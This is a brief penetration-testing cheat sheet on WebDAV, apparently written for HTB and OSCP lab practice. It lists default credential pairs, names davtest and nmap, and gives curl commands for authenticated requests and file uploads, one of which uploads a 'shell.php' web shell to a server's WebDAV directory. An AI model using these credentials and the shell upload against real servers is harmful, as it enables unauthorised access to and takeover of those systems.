WebDav
Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP.
user | pass |
---|---|
wampp | wampp |
jigsaw | jigsaw |
davtest
nmap
GET request
curl "http://$IP/webdav/" --user "wampp:wampp"
curl "http://$IP/webdav/" --user "jigsaw:jigsaw"
curl "http://$IP/webdav/" --user "$USER:$PASS"
PUT request
curl -T "proof.txt" "http://$IP/"
curl -T "proof.txt" "http://$IP/" --user "$USER:$PASS"
curl -T "shell.php" "http://$IP/webdav/" --user "administrant:sleepless"
Conect ftp-like